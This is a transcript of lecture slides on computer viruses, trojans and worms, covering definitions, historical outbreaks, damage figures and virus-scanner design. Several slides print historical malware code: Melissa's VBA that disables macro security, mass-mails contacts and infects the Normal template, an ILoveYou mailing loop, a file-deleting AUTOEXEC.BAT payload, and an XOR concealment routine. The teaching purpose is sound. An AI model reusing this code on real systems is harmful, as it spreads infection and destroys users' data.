Presentation is loading. Please wait.

Presentation is loading. Please wait.

Viruses, Trojans, and Worms Prabhaker Mateti. Mateti, Viruses, Trojans and Worms2 Virus Awareness Virus Bulletin Virus Bulletin

Published byDestiny Harlowe Modified over 9 years ago

Similar presentations

Presentation on theme: "Viruses, Trojans, and Worms Prabhaker Mateti. Mateti, Viruses, Trojans and Worms2 Virus Awareness Virus Bulletin Virus Bulletin"— Presentation transcript:

1 Viruses, Trojans, and Worms Prabhaker Mateti

2 Mateti, Viruses, Trojans and Worms2 Virus Awareness Virus Bulletin Virus Bulletin http://www.virusbtn.com/ http://www.virusbtn.com/ http://www.virusbtn.com/ Technical journal on developments in the field of computer viruses and anti-virus products Technical journal on developments in the field of computer viruses and anti-virus products Virus Map, Calendar, … Virus Map, Calendar, … http://home.mcafee.com/VirusInfo/ http://home.mcafee.com/VirusInfo/ http://home.mcafee.com/VirusInfo/ PC Viruses In-the-Wild PC Viruses In-the-Wild To offset the 'numbers games' played antivirus vendors. To offset the 'numbers games' played antivirus vendors. Virus In the Wild: Must be spreading as a result of normal day-to-day operations on and between the computers of unsuspecting users. Virus In the Wild: Must be spreading as a result of normal day-to-day operations on and between the computers of unsuspecting users. http://www.wildlist.org/WildList/201004.htm http://www.wildlist.org/WildList/201004.htm http://www.wildlist.org/WildList/201004.htm

3 Journal in Computer Virology Publisher: http://www.springerlink.com/content/1772-9890/ Publisher: http://www.springerlink.com/content/1772-9890/http://www.springerlink.com/content/1772-9890/ Malware detection using assembly and API call sequences Volume 7, Number 2 / May 2011 Malware detection using assembly and API call sequences Volume 7, Number 2 / May 2011 Malware detection using assembly and API call sequences 7 Malware detection using assembly and API call sequences 7 Malware and steganography in hard disk firmware February 2011 Malware and steganography in hard disk firmware February 2011 Malware and steganography in hard disk firmware Malware and steganography in hard disk firmware Managing university internet access: balancing the need for security, privacy and digital evidence November 2010 Managing university internet access: balancing the need for security, privacy and digital evidence November 2010 Managing university internet access: balancing the need for security, privacy and digital evidence Managing university internet access: balancing the need for security, privacy and digital evidence Volume 6, 2010 Selected Articles Volume 6, 2010 Selected Articles A general definition of malware A general definition of malware A general definition of malware A general definition of malware Identification of file infecting viruses through detection of self-reference replication Identification of file infecting viruses through detection of self-reference replication Identification of file infecting viruses through detection of self-reference replication Identification of file infecting viruses through detection of self-reference replication Analysis of a scanning model of worm propagation Analysis of a scanning model of worm propagation Analysis of a scanning model of worm propagation Analysis of a scanning model of worm propagation Volume 4, 2008 Selected Articles Volume 4, 2008 Selected Articles Rootkit modeling and experiments under Linux Rootkit modeling and experiments under Linux Rootkit modeling and experiments under Linux Rootkit modeling and experiments under Linux Advances in password cracking Advances in password cracking Advances in password cracking Advances in password cracking Discovering and exploiting 802.11 wireless driver vulnerabilities Discovering and exploiting 802.11 wireless driver vulnerabilities Discovering and exploiting 802.11 wireless driver vulnerabilities Discovering and exploiting 802.11 wireless driver vulnerabilities Mateti, Viruses, Trojans and Worms3

4 4 Lies, damned lies and anti-virus statistics? It is estimated that PC Viruses cost businesses approximately It is estimated that PC Viruses cost businesses approximately $55 Billion in damages in 2003 $55 Billion in damages in 2003 $30 Billion in 2002 $30 Billion in 2002 $13 Billion in 2001 $13 Billion in 2001 www.computerworld.com/securitytopics/security/story/0,10801,89138,0 0.html www.computerworld.com/securitytopics/security/story/0,10801,89138,0 0.html www.computerworld.com/securitytopics/security/story/0,10801,89138,0 0.html www.computerworld.com/securitytopics/security/story/0,10801,89138,0 0.html Source www.computereconomics.com/ Source www.computereconomics.com/www.computereconomics.com/ 2001$13.2 billion 2001$13.2 billion 2000$17.1 billion 2000$17.1 billion 1999$12.1 billion 1999$12.1 billion Nimda$635 million, Nimda$635 million, Code Red$2.62 billion Code Red$2.62 billion SirCam$1.15 billion SirCam$1.15 billion Code Red $8.7bn in damage estimated. -- Reuters wire service. Aug 2, 2001 Code Red $8.7bn in damage estimated. -- Reuters wire service. Aug 2, 2001

5 Mateti, Viruses, Trojans and Worms5 1988: Less than 10 known viruses 1988: Less than 10 known viruses 1990: New virus found every day 1990: New virus found every day 1993: 10-30 new viruses per week 1993: 10-30 new viruses per week 1999: 45,000 viruses and variants 1999: 45,000 viruses and variants Source: McAfee

6 Mateti, Viruses, Trojans and Worms6

7 7 May 25, 2004 Source: http://www.rav.ro/ravmsstats/

8 Mateti, Viruses, Trojans and Worms8 Malware Hard to define precisely. Popular media additionally distorts. Hard to define precisely. Popular media additionally distorts. “Viruses” has come to mean all malware. “Viruses” has come to mean all malware. Academicians still try to distinguish among Academicians still try to distinguish among Viruses, Trojans, Worms,... Viruses, Trojans, Worms,... Based on Propagation of code Based on Propagation of code Benign uses of Viruses, Trojans and Worms are possible. Benign uses of Viruses, Trojans and Worms are possible.

9 Mateti, Viruses, Trojans and Worms9 Viruses “Officially,” in the sense of ELF etc “Officially,” in the sense of ELF etc not a program. Not even a separate file. not a program. Not even a separate file. Code that will reproduce itself, and... Code that will reproduce itself, and... Definition from RFC 1135: A virus is a piece of code that inserts itself into a host [program], including operating systems, to propagate. It cannot run independently. It requires that its host program be run to activate it. Definition from RFC 1135: A virus is a piece of code that inserts itself into a host [program], including operating systems, to propagate. It cannot run independently. It requires that its host program be run to activate it. Internet Security Glossary Internet Security Glossary http://www.rfc-editor.org/rfc/rfc4949.txt http://www.rfc-editor.org/rfc/rfc4949.txt http://www.rfc-editor.org/rfc/rfc4949.txt

10 Mateti, Viruses, Trojans and Worms10 Worm A worm propagates between systems. A worm propagates between systems. It does not “reproduce” or infect. It does not “reproduce” or infect. Definition from RFC 1135: A worm is a program that can run independently, will consume the resources of its host [machine] from within in order to maintain itself and can propagate a complete working version of itself on to other machines. Definition from RFC 1135: A worm is a program that can run independently, will consume the resources of its host [machine] from within in order to maintain itself and can propagate a complete working version of itself on to other machines. Internet Security Glossary Internet Security Glossary http://www.rfc-editor.org/rfc/rfc4949.txt http://www.rfc-editor.org/rfc/rfc4949.txt http://www.rfc-editor.org/rfc/rfc4949.txt

11 Mateti, Viruses, Trojans and Worms11 Logic Bomb: Logic Bomb: A logic bomb executes when specific conditions occur. Logic Bomb: A logic bomb executes when specific conditions occur. Triggers for logic bombs can include change in a file, by a particular series of keystrokes, or at a specific time or date. Triggers for logic bombs can include change in a file, by a particular series of keystrokes, or at a specific time or date.

12 Mateti, Viruses, Trojans and Worms12 Trapdoor Trapdoors allow access to a system by skipping the usual login routine. Trapdoors allow access to a system by skipping the usual login routine. Overall goal of rootkits: install trapdoors Overall goal of rootkits: install trapdoors

13 Mateti, Viruses, Trojans and Worms13 Macro Virus Sometimes considered a worm. Sometimes considered a worm. Requires a host program to process/run it. Requires a host program to process/run it. Written in Visual Basic for Application for Word, Access, Excel, PowerPoint, and Outlook etc. E.g., Melissa Written in Visual Basic for Application for Word, Access, Excel, PowerPoint, and Outlook etc. E.g., Melissa

14 Mateti, Viruses, Trojans and Worms14 The Original Trojan Horse Trojan horses are named after Homer’s Iliad story of Greeks gifting a huge wooden horse to Troy that housed soldiers who emerged in the night and attacked the city. Trojan horses are named after Homer’s Iliad story of Greeks gifting a huge wooden horse to Troy that housed soldiers who emerged in the night and attacked the city.

15 Mateti, Viruses, Trojans and Worms15 Trojan Horses Trojan horses are programs that appear to have one function but actually perform another function. Trojan horses are programs that appear to have one function but actually perform another function. Modern-day Trojan horses resemble a program that the user wishes to run -- a game, a spreadsheet, or an editor. While the program appears to be doing what the user wants, it is also doing something else unrelated to its advertised purpose, and without the user's knowledge. Modern-day Trojan horses resemble a program that the user wishes to run -- a game, a spreadsheet, or an editor. While the program appears to be doing what the user wants, it is also doing something else unrelated to its advertised purpose, and without the user's knowledge.

16 Mateti, Viruses, Trojans and Worms16 Types of Propagation Parasitic Parasitic Propagates by being a parasite on other files. Propagates by being a parasite on other files. Attaching itself in some manner that still leaves the original file usable. Attaching itself in some manner that still leaves the original file usable..com and.exe files of MS-DOS.com and.exe files of MS-DOS Macro virus Macro virus Boot sector infectors Boot sector infectors Copy themselves to the bootable portion of the hard (or floppy) disk. Copy themselves to the bootable portion of the hard (or floppy) disk. The virus gains control when the system is booted. The virus gains control when the system is booted.

17 Mateti, Viruses, Trojans and Worms17 Normal boot procedure of a PC POST (Power On Self Test) POST (Power On Self Test) BIOS (Basic Input/Output System) discovers bootable devices, reads the boot sector from such a device, and passes control to it. BIOS (Basic Input/Output System) discovers bootable devices, reads the boot sector from such a device, and passes control to it. Bootable hard disks contain a Master Boot Record (MBR). Bootable hard disks contain a Master Boot Record (MBR). Chunk of code at the beginning of the hard drive. Chunk of code at the beginning of the hard drive. Also contains the partition table. Also contains the partition table. The MBR code will look for a particular partition that is marked bootable (MSDOS fdisk: active), and then transfer control to the code. The MBR code will look for a particular partition that is marked bootable (MSDOS fdisk: active), and then transfer control to the code.

18 Mateti, Viruses, Trojans and Worms18 Boot sector viruses Insert themselves into the boot sector area. Insert themselves into the boot sector area. When the system boots, they can “do their thing,” and then transfer control the the relocated code that they replaced. When the system boots, they can “do their thing,” and then transfer control the the relocated code that they replaced.

19 Mateti, Viruses, Trojans and Worms19 Multi-partite Viruses Refers to viruses that can use multiple means of infection, such as Refers to viruses that can use multiple means of infection, such as MBR MBR Boot sector Boot sector Parasitic Parasitic

20 Mateti, Viruses, Trojans and Worms20 Payload Refers to what the virus does (besides propagation) once executed. Refers to what the virus does (besides propagation) once executed. Do nothing Do nothing Do cute things Do cute things Malicious damage (such as delete your partition table). Malicious damage (such as delete your partition table). Some viruses have a particular trigger. Some viruses have a particular trigger. Date Date Number of successful infections Number of successful infections Smart viruses use an infrequent trigger so that they have time to ensure they have propagated, before the users get alerted Smart viruses use an infrequent trigger so that they have time to ensure they have propagated, before the users get alerted

21 Mateti, Viruses, Trojans and Worms21 Morris 1988 Internet Worm Robert Morris in Nov. 1988 used four methods to gain access to computers on the net. One of them involved a buffer overflow attack on fingerd Robert Morris in Nov. 1988 used four methods to gain access to computers on the net. One of them involved a buffer overflow attack on fingerd Invoking finger with the appropriate string, the worm could make the daemon at a remote site have a buffer overflow and execute code that gave the worm access to the remote system Invoking finger with the appropriate string, the worm could make the daemon at a remote site have a buffer overflow and execute code that gave the worm access to the remote system Once the worm gained access to a system, it would replicate itself and consume virtually all of the machine’s computing resources Once the worm gained access to a system, it would replicate itself and consume virtually all of the machine’s computing resources Hundreds of machines on the net were paralyzed until security experts figured out how to kill the worm Hundreds of machines on the net were paralyzed until security experts figured out how to kill the worm Morris turned himself in, was prosecuted and sentenced to Morris turned himself in, was prosecuted and sentenced to 3 years probation 3 years probation 400 hours of community service 400 hours of community service $10,500 fine $10,500 fine (Incidentally, Morris is now a professor at MIT.) (Incidentally, Morris is now a professor at MIT.) http://en.wikipedia.org/wiki/Morris_worm http://en.wikipedia.org/wiki/Morris_worm http://en.wikipedia.org/wiki/Morris_worm

22 Mateti, Viruses, Trojans and Worms22 Pikachu Worm 2000 Accesses Outlook Address Book. Requires Visual Basic 6 runtime. Sends messages with its body attached to everyone in this address book. Accesses Outlook Address Book. Requires Visual Basic 6 runtime. Sends messages with its body attached to everyone in this address book. The worm is attached to the message as PIKACHUPOKEMON.EXE. The worm is attached to the message as PIKACHUPOKEMON.EXE. Overwrites the AUTOEXEC.BAT file with the following: @ECHO OFF del C:\WINDOWS\*.* del C:\WINDOWS\SYSTEM\*.* Overwrites the AUTOEXEC.BAT file with the following: @ECHO OFF del C:\WINDOWS\*.* del C:\WINDOWS\SYSTEM\*.*

23 Melissa Worm 1999 CERT® Advisory CA-1999-04. March 26, 1999. CERT® Advisory CA-1999-04. March 26, 1999. Infected more than one million personal computers in North America. Infected more than one million personal computers in North America. Caused more than $80 million in damage. Caused more than $80 million in damage. Infects NORMAL.DOT, and will infect all documents thereafter. Infects NORMAL.DOT, and will infect all documents thereafter. The macro is "Document_Close()" so that any document that is worked on will be infected when it is closed. The macro is "Document_Close()" so that any document that is worked on will be infected when it is closed. When a document is infected the macro inserted is "Document_Open()" so that the macro runs when the document is opened. When a document is infected the macro inserted is "Document_Open()" so that the macro runs when the document is opened. David L. Smith, 31, of Aberdeen Township, NJ David L. Smith, 31, of Aberdeen Township, NJ Pleads Guilty. The state will recommended a sentence of 10 years, which is the maximum sentence provided by law. Pleads Guilty. The state will recommended a sentence of 10 years, which is the maximum sentence provided by law. Jailed for 20 months and imposed a $5,000 fine. May 2, 2002 Jailed for 20 months and imposed a $5,000 fine. May 2, 2002 Jailed for 20 months Jailed for 20 months Mateti, Viruses, Trojans and Worms23

24 Mateti, Viruses, Trojans and Worms24 Melissa Worm Disables the macro security features Disables the macro security features If System.PrivateProfileString("", "HKEY_CURRENT_USER \Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then CommandBars("Macro").Controls("Security...").Enabled = False System.PrivateProfileString("", "HKEY_CURRENT_USER \Software\Microsoft\Office\9.0\Word\Security", "Level") = 1& Else p$ = "clone" CommandBars("Tools").Controls("Macro").Enabled = False Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1) End If

25 Mateti, Viruses, Trojans and Worms25 Melissa Worm MAPI stands for “Messaging API”, a way for Windows applications to interface with various e-mail functionalities. MAPI stands for “Messaging API”, a way for Windows applications to interface with various e-mail functionalities. Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice Set UngaDasOutlook = CreateObject("Outlook.Application") Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI") Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice Set UngaDasOutlook = CreateObject("Outlook.Application") Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI") A way to tell if it has already infected the host. A way to tell if it has already infected the host. If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", " Melissa ?") <> "... by Kwyjibo" Then If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", " Melissa ?") <> "... by Kwyjibo" Then

26 Mateti, Viruses, Trojans and Worms26 Melissa Worm Check if the application is Outlook Check if the application is Outlook Compose of a list of the first 50 email addresses from the address book Compose of a list of the first 50 email addresses from the address book If UngaDasOutlook = "Outlook" Then DasMapiName.Logon "profile", "password" For y = 1 To DasMapiName.AddressLists.Count Set AddyBook = DasMapiName.AddressLists(y) x = 1 Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0) For oo = 1 To AddyBook.AddressEntries.Count Peep = AddyBook.AddressEntries(x) BreakUmOffASlice.Recipients.Add Peep x = x + 1 If x > 50 Then oo = AddyBook.AddressEntries.Count Next oo

27 Mateti, Viruses, Trojans and Worms27 Melissa Worm Actually send emails Actually send emails BreakUmOffASlice.Subject = "Important Message From " & Application.UserName BreakUmOffASlice.Body = "Here is that document you asked for... don't show anyone else ;-)" BreakUmOffASlice.Attachments.Add ActiveDocument.FullName BreakUmOffASlice.Send Wrap up Wrap up Peep = "" Next y DasMapiName.Logoff End If p$ = "clone" System.PrivateProfileString("", "HKEY_CURRENT_USER \Software\Microsoft\Office\", "<B style= "color:black;background-color:#ffff66">Melissa ?") = "... by Kwyjibo" End If

28 Mateti, Viruses, Trojans and Worms28 Melissa Worm Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1) Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1) NTCL = NTI1.CodeModule.CountOfLines ADCL = ADI1.CodeModule.CountOfLines BGN = 2 If ADI1.Name <> " Melissa " Then If ADCL > 0 Then _ ADI1.CodeModule.DeleteLines 1, ADCL Set ToInfect = ADI1 ADI1.Name = " Melissa " DoAD = True End If If NTI1.Name <> " Melissa " Then If NTCL > 0 Then _ NTI1.CodeModule.DeleteLines 1, NTCL Set ToInfect = NTI1 NTI1.Name = " Melissa " DoNT = True End If If DoNT <> True And DoAD <> True Then GoTo CYA

29 ILoveYou worm 2000 CERT® Advisory CA-2000-04 Love Letter Worm May 4, 2000 CERT® Advisory CA-2000-04 Love Letter Worm May 4, 2000 An attachment named "LOVE-LETTER-FOR- YOU.TXT.VBS" An attachment named "LOVE-LETTER-FOR- YOU.TXT.VBS" A subject of "ILOVEYOU" A subject of "ILOVEYOU" The body of the message reads "kindly check the attached LOVELETTER coming from me." The body of the message reads "kindly check the attached LOVELETTER coming from me." This 328-line program caused (by some estimates) ~$10B in damage. This 328-line program caused (by some estimates) ~$10B in damage. How much work and smarts was required? How much work and smarts was required? Mateti, Viruses, Trojans and Worms29

30 Mateti, Viruses, Trojans and Worms30 ILoveYou Excerpt rem barok -loveletter(vbe) rem barok -loveletter(vbe) rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philippines... sub spreadtoemail() for ctrlists=1 to mapi.AddressLists.Count for ctrlists=1 to mapi.AddressLists.Count set a=mapi.AddressLists(ctrlists) set a=mapi.AddressLists(ctrlists) x=1 x=1 for ctrentries=1 to a.AddressEntries.Count for ctrentries=1 to a.AddressEntries.Count malead=a.AddressEntries(x) malead=a.AddressEntries(x) set male=out.CreateItem(0) set male=out.CreateItem(0) male.Recipients.Add(malead) male.Recipients.Add(malead) male.Subject = “ILOVEYOU” male.Subject = “ILOVEYOU” male.Body = “kindly check the attached LOVELETTER coming..” male.Body = “kindly check the attached LOVELETTER coming..” male.Attachments.Add(dirsystem&“\LOVE-LETTER-FOR-YOU.TXT.vbs”) male.Attachments.Add(dirsystem&“\LOVE-LETTER-FOR-YOU.TXT.vbs”) male.Send male.Send x=x+1 x=x+1 next next end sub

31 Mateti, Viruses, Trojans and Worms31 Anatomy of a Virus Two primary components Two primary components Propagation mechanism Propagation mechanism Payload Payload Propagation Propagation Method by which the virus spreads itself. Method by which the virus spreads itself. Old days: single PC, transferred to other hosts by ways of floppy diskettes. Old days: single PC, transferred to other hosts by ways of floppy diskettes. Nowadays: Internet. Nowadays: Internet.

32 Mateti, Viruses, Trojans and Worms32 Structure of A Virus Virus() { infectExecutable(); if (triggered()) { doDamage(); } jump to main of infected program; } void infectExecutable() { file = choose an uninfected executable file; prepend V to file; } void doDamage() {... } int triggered() { return (some test? 1 : 0); }

33 Mateti, Viruses, Trojans and Worms33 Case Study: MS-DOS.com Virus Virus Code == V1; V2. Program infected == P1 Virus Code == V1; V2. Program infected == P1 V1, the Replicator. V1, the Replicator. Rewrites program file as: V1; jump to V2; P1; V2. Rewrites program file as: V1; jump to V2; P1; V2. V2, the Concealer. Copies P1 over V1. V2, the Concealer. Copies P1 over V1. Bomb (payload) Bomb (payload) Infecting.EXE file is much more complicated. Infecting.EXE file is much more complicated.

34 Mateti, Viruses, Trojans and Worms34.com Virus: Conceal via simple XOR encryption encrypt_val db ? decrypt:encrypt: mov ah, encrypt_val mov ah, encrypt_val mov cx, part_to_encrypt_end - part_to_encrypt_start mov cx, part_to_encrypt_end - part_to_encrypt_start mov si, part_to_encrypt_start mov si, part_to_encrypt_start mov di, si mov di, sixor_loop: lodsb ; DS:[SI] -> AL lodsb ; DS:[SI] -> AL xor al, ah xor al, ah stosb ; AL -> ES:[DI] stosb ; AL -> ES:[DI] loop xor_loop loop xor_loop ret ret

35 Mateti, Viruses, Trojans and Worms35.com Virus Possible Bombs System slowdown System slowdown Easily handled by trapping an interrupt and causing a delay when it activates. Easily handled by trapping an interrupt and causing a delay when it activates. File deletion. File deletion. Message Display. Message Display. Killing/Replacing the partition table or boot sector of the hard drive. Killing/Replacing the partition table or boot sector of the hard drive.

36 Mateti, Viruses, Trojans and Worms36 The Linux Virus Writing HOWTO “Abstract: This document describes how to write parasitic file viruses infecting ELF executables on Linux/i386. Though it contains a lot of source code, no actual virus is included.” “Abstract: This document describes how to write parasitic file viruses infecting ELF executables on Linux/i386. Though it contains a lot of source code, no actual virus is included.” http://www.google.com/search?hl=en&q=L inux+Virus+Writing+HOWTO+&btnG=Sear ch http://www.google.com/search?hl=en&q=L inux+Virus+Writing+HOWTO+&btnG=Sear ch http://www.google.com/search?hl=en&q=L inux+Virus+Writing+HOWTO+&btnG=Sear ch http://www.google.com/search?hl=en&q=L inux+Virus+Writing+HOWTO+&btnG=Sear ch

37 Make Viruz, On Demand Readily available online kits Readily available online kits This viruz maker kit is detected as Troj/Agent-GOF. This viruz maker kit is detected as Troj/Agent-GOF. Mateti, Viruses, Trojans and Worms37

38 Mateti, Viruses, Trojans and Worms38 Virus Scanner Design Compare pieces of code to a database of known malicious code Compare pieces of code to a database of known malicious code Just matching byte sequences in the code Just matching byte sequences in the code Identify viruses by their “signatures.” Identify viruses by their “signatures.” Search for these patterns in executable files. Search for these patterns in executable files. Watch for changes in files. Watch for changes in files.

39 Mateti, Viruses, Trojans and Worms39 Virus Scanners Internals

40 Mateti, Viruses, Trojans and Worms40 Virus Scanners Internals

41 Anti-malware Products 2010 From CARO 2010 Presentation slides http://www.caro2010.org/ From CARO 2010 Presentation slides http://www.caro2010.org/ http://www.caro2010.org/ Based on data from about 30 products (2010) Based on data from about 30 products (2010) Installer Size: 69.6 MB Installer Size: 69.6 MB Size on Disk: 265.5 MB Size on Disk: 265.5 MB Number of Signatures: 3,666,872 Number of Signatures: 3,666,872 Size of Signatures: 84.4 MB Size of Signatures: 84.4 MB Updates per Day: 6 Updates per Day: 6 WildList Detection: (virtually) 100% WildList Detection: (virtually) 100% Zoo Detection: 91.59% Zoo Detection: 91.59% False Positives: 0.00157% False Positives: 0.00157% Mateti, Viruses, Trojans and Worms41

42 Virus Scanners Today Only have a chance to work if you update them, say every 3 hours and your vendor identifies new viruses in 1 hour Only have a chance to work if you update them, say every 3 hours and your vendor identifies new viruses in 1 hour But...still useful to protect you from old viruses. But...still useful to protect you from old viruses. Active area for academic research Active area for academic research “Avfs: An On-Access Anti-Virus File System”, Yevgeniy Miretskiy, Abhijith Das, Charles P. Wright, and Erez Zadok, Stony Brook University; http://www.usenix.org/event/sec04/tech/full_papers/miretskiy/miretskiy_ html/ 2004 “Avfs: An On-Access Anti-Virus File System”, Yevgeniy Miretskiy, Abhijith Das, Charles P. Wright, and Erez Zadok, Stony Brook University; http://www.usenix.org/event/sec04/tech/full_papers/miretskiy/miretskiy_ html/ 2004 http://www.usenix.org/event/sec04/tech/full_papers/miretskiy/miretskiy_ html/ http://www.usenix.org/event/sec04/tech/full_papers/miretskiy/miretskiy_ html/ “Hash-AV: fast virus signature scanning by cache-resident filters”, Ozgun Erdogan and Pei Cao, Stanford University, International Journal of Security and Networks Issue: Vol 2, No 1-2, 2007 pp. 50 – 59 “Hash-AV: fast virus signature scanning by cache-resident filters”, Ozgun Erdogan and Pei Cao, Stanford University, International Journal of Security and Networks Issue: Vol 2, No 1-2, 2007 pp. 50 – 59 Limitations of Current Anti-Virus Scanning Technologies, Srinivas Mukkamala, Antonins Sulaiman, P Chavez, AH Sung, New Mexico Tech, USA New Mexico Tech, in the book “Advances in Enterprise Information Technology Security”, 2007 Limitations of Current Anti-Virus Scanning Technologies, Srinivas Mukkamala, Antonins Sulaiman, P Chavez, AH Sung, New Mexico Tech, USA New Mexico Tech, in the book “Advances in Enterprise Information Technology Security”, 2007 Limitations of Current Anti-Virus Scanning Technologies Limitations of Current Anti-Virus Scanning Technologies Mateti, Viruses, Trojans and Worms42

43 Mateti, Viruses, Trojans and Worms43 Be Very Afraid... ILoveYou ILoveYou When really dumb people with no resources write malicious programs, it costs $10B. When really dumb people with no resources write malicious programs, it costs $10B. Easy to make ILoveYou much more harmful: Easy to make ILoveYou much more harmful: Instead of just forwarding itself, change a few random bits in random documents Instead of just forwarding itself, change a few random bits in random documents Post documents with “interesting” names on a public web site Post documents with “interesting” names on a public web site What would happen if smart people with resources wrote a malicious program? What would happen if smart people with resources wrote a malicious program?

44 Mateti, Viruses, Trojans and Worms44 Its a Jungle Out There... Reasonable approximation: Reasonable approximation: Any program you run can do anything to your machine: erase all your files, send incriminating email to all your friends, quietly tamper with one number in a spreadsheet, etc. Any program you run can do anything to your machine: erase all your files, send incriminating email to all your friends, quietly tamper with one number in a spreadsheet, etc. Any document you open or web page you visit is a program. Any document you open or web page you visit is a program.

45 Mateti, Viruses, Trojans and Worms45 References 1. Vesselin Bontchev, Future Trends in Virus Writing, 1994, IFIP TC- 11, www.commandcom.com/ virus/ trends.html www.commandcom.com/ virus/ trends.html www.commandcom.com/ virus/ trends.html 2. Sandeep Kumar, and Gene Spafford, "A Generic Virus Scanner in C++," Proceedings of the 8th Computer Security Applications Conference; IEEE Press, Piscataway, NJ; pp. 210-219, 2-4 Dec 1992. [Local copy.pdf] Local copy.pdfLocal copy.pdf 3. Antivirus Research - Scientific Papers http://www.research.ibm.com/antivirus/SciPapers.htm http://www.research.ibm.com/antivirus/SciPapers.htm 4. Anthony Cheuk Tung Lai, "Comprehensive Blended Malware Threat Dissection Analyze Fake Anti-Virus Software and PDF Payloads", 2010, http://www.sans.org/reading_room/ http://www.sans.org/reading_room/ 5. Bryan Barber, " Cheese Worm: Pros and Cons of a Friendly Worm", 2003, http://www.sans.org/reading_room/ http://www.sans.org/reading_room/

Download ppt "Viruses, Trojans, and Worms Prabhaker Mateti. Mateti, Viruses, Trojans and Worms2 Virus Awareness Virus Bulletin Virus Bulletin"

Similar presentations

Let’s Talk About Cyber Security

Let’s Talk About Cyber Security
Thank you to IT Training at Indiana University Computer Malware.

Thank you to IT Training at Indiana University Computer Malware.
Presented by: Melissa Dark CERIAS, Purdue University.

Presented by: Melissa Dark CERIAS, Purdue University.
September,2012 Managing Files and Folders 4/23/2015 Compiled By:- Solomon W. Demissie 1.

September,2012 Managing Files and Folders 4/23/2015 Compiled By:- Solomon W. Demissie 1.
Lecture: Malicious Code CIS 3360 Ratan K. Guha. Malicious Code2 Overview and Reading Assignments Defining malicious logic Types Action by Viruses Reading.

Lecture: Malicious Code CIS 3360 Ratan K. Guha. Malicious Code2 Overview and Reading Assignments Defining malicious logic Types Action by Viruses Reading.
Computer Viruses and Worms* *Referred to slides by Dragan Lojpur, Zhu Fang at Florida State University.

Computer Viruses and Worms* *Referred to slides by Dragan Lojpur, Zhu Fang at Florida State University.
 Application software consists of programs designed to make users more productive and/or assist with personal tasks.  Growth of internet simplified.

 Application software consists of programs designed to make users more productive and/or assist with personal tasks.  Growth of internet simplified.
Dr. John P. Abraham Professor UTPA 2 – Systems Threats and Risks.

Dr. John P. Abraham Professor UTPA 2 – Systems Threats and Risks.
Unit 18 Data Security 1.

Unit 18 Data Security 1.
Chapter 14 Computer Security Threats Patricia Roy Manatee Community College, Venice, FL ©2008, Prentice Hall Operating Systems: Internals and Design Principles,

Chapter 14 Computer Security Threats Patricia Roy Manatee Community College, Venice, FL ©2008, Prentice Hall Operating Systems: Internals and Design Principles,
Viruses, Malicious Code, & Other Nasty Stuff Presented by: Melissa Dark K-12 Outreach Coordinator CERIAS, Purdue University 765.496.6762.

Viruses, Malicious Code, & Other Nasty Stuff Presented by: Melissa Dark K-12 Outreach Coordinator CERIAS, Purdue University
CSE331: Introduction to Networks and Security Lecture 31 Fall 2002.

CSE331: Introduction to Networks and Security Lecture 31 Fall 2002.
Guide to Operating System Security Chapter 2 Viruses, Worms, and Malicious Software.

Guide to Operating System Security Chapter 2 Viruses, Worms, and Malicious Software.
Created by Dragon Lee May-2003. Computer Virus What is computer virus? Computer virus refers to a program which damages computer systems and/or destroys.

Created by Dragon Lee May Computer Virus What is computer virus? Computer virus refers to a program which damages computer systems and/or destroys.
Computer Technology Part 5 Megan Rees ERMS 5/13.  Set of program instructions that attaches itself to a file, reproduces itself, and/or spreads to other.

Computer Technology Part 5 Megan Rees ERMS 5/13.  Set of program instructions that attaches itself to a file, reproduces itself, and/or spreads to other.
Henric Johnson1 Chapter 10 Malicious Software Henric Johnson Blekinge Institute of Technology, Sweden

Henric Johnson1 Chapter 10 Malicious Software Henric Johnson Blekinge Institute of Technology, Sweden
Video Following is a video of what can happen if you don’t update your security settings! security.

Video Following is a video of what can happen if you don’t update your security settings! security.
Viruses, Trojan Horses, and Worms

Viruses, Trojan Horses, and Worms
1 Chap 10 Malicious Software. 2 Viruses and ”Malicious Programs ” Computer “Viruses” and related programs have the ability to replicate themselves on.

1 Chap 10 Malicious Software. 2 Viruses and ”Malicious Programs ” Computer “Viruses” and related programs have the ability to replicate themselves on.
Viruses.

Viruses.

Similar presentations

Ads by Google